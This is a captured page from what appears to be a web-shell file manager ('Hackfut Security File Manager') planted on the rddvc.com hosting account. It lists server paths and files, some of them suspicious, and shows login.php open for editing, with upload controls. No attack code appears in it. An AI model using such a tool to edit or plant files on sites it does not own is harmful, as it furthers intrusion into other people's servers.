Hackfut Security File Manager
Current Path:
/home/u126195517/domains/rddvc.com/public_html
home
/
u126195517
/
domains
/
rddvc.com
/
public_html
/
📁
..
📄
.htaccess
(217 B)
📁
PS_Creation1
📄
about.php
(8.03 KB)
📄
aboutdvc.php
(1.05 KB)
📄
ap-06Mar2026.txt
(15 B)
📄
banner.php
(2.07 KB)
📄
benifits.php
(4.57 KB)
📄
brochure_download_kriya.php
(715 B)
📄
cc.php
(15.7 KB)
📄
checkCoverImageSize.php
(790 B)
📄
checkLogoImageSize.php
(785 B)
📄
checkPayProofImageSize.php
(804 B)
📄
check_availability.php
(1011 B)
📄
contact.php
(2.53 KB)
📄
contact_form.php
(3.43 KB)
📄
copyright.php
(834 B)
📁
css
📁
cssphp
📄
diamond.php
(27.44 KB)
📄
digital_visiting_card.php
(2.7 KB)
📄
disp_pln_amt.js
(454 B)
📄
dom.txt
(1 B)
📄
dvc_design.php
(3.01 KB)
📄
dvc_design_form.php
(7.08 KB)
📄
dvc_design_function.php
(10.09 KB)
📄
dvc_design_gold.php
(4.37 KB)
📄
enquiry_form.php
(2.06 KB)
📄
features.php
(3.32 KB)
📄
final_payment.php
(6.34 KB)
📄
final_payment_form.php
(1.22 KB)
📁
fonts
📄
footer.php
(3.86 KB)
📄
get_discount_rate.php
(1.26 KB)
📄
get_plan_amount.php
(1.06 KB)
📄
gold.php
(18.48 KB)
📄
google028f325756238b38.html
(53 B)
📄
googledbda1fce9a3128a0.html
(53 B)
📄
header.php
(1.74 KB)
📁
images
📄
index.php
(4.11 KB)
📄
js.php
(224.41 KB)
📄
loader.php
(20.86 KB)
📄
login.php
(2.35 KB)
📄
login_form.php
(2.75 KB)
📁
members
📄
name_availability.js
(338 B)
📄
newsletter.php
(841 B)
📁
offline
📄
offline_cards.php
(2.89 KB)
📄
onetwothree3.php
(177.99 KB)
📄
online_cards.php
(1.1 KB)
📄
payment-failed.php
(96 B)
📄
payment-success.php
(1.01 KB)
📄
payment_checkout_kriya.php
(3.7 KB)
📄
price.php
(8.44 KB)
📄
privacypolicy.php
(9.28 KB)
📄
process_success.php
(2.71 KB)
📄
processoutput.php
(2.73 KB)
📄
redeemcoupon.js
(1.9 KB)
📄
robots.txt
(63 B)
📄
select_design.php
(1.45 KB)
📄
send_contactus_email.php
(1.33 KB)
📁
shop
📄
termsandconditions.php
(472 KB)
📄
testimonials.php
(3.37 KB)
📄
trycode_1.php
(354 B)
📄
v3.php
(20.86 KB)
📁
wp-admin
📁
wp-content
📁
wp-includes
Editing: login.php
<!DOCTYPE html> <html lang="zxx"> <head> <title>RD's Digital Visiting Card | Login </title> <link href="images/rddvc_icon.png" rel="shortcut icon" /> <!-- Meta tag Keywords --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="UTF-8" /> <meta name="keywords" content="Digital Visiting Card, India, Pune, RDDVC, Online Business Card, Virtual Business Card, Contactless Business Card, Professional Networking, Pune Business, RDDVC India, Best Digital Visiting Card in India, digital card, digital card maker, visiting card, business cards, rds digital visiting card, DVC"> <script> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar() { window.scrollTo(0, 1); } </script> <!-- //Meta tag Keywords --> <!-- Custom-Files --> <link rel="stylesheet" href="css/bootstrap.css"> <!-- Bootstrap-Core-CSS --> <link rel="stylesheet" href="css/style.css" type="text/css" media="all" /> <!-- Style-CSS --> <!-- font-awesome-icons --> <link href="css/font-awesome.css" rel="stylesheet"> <!-- //font-awesome-icons --> </head> <body> <!--/home --> <div id="home" class="inner-w3pvt-page"> <div class="overlay-innerpage"> <!--/top-nav --> <div class="top_w3pvt_main container"> <!--/header --> <?php include_once('header.php'); ?> <!--//header --> <!--/breadcrumb--> <div class="inner-w3pvt-page-info"> <ol class="breadcrumb d-flex"> <li class="breadcrumb-item"> <a href="index.php">Home</a> </li> <li class="breadcrumb-item active">Login</li> </ol> </div> <!--//breadcrumb--> </div> <!-- //top-nav --> </div> </div> <!-- //home --> <!--/typo --> <?php include_once('login_form.php'); ?> <!--//typo --> <!-- footer --> <?php include_once('footer.php'); ?> <!-- //footer --> <!-- copyright --> <?php include_once('copyright.php'); ?> <!-- //copyright --> </body> </html>
Upload File
Create Folder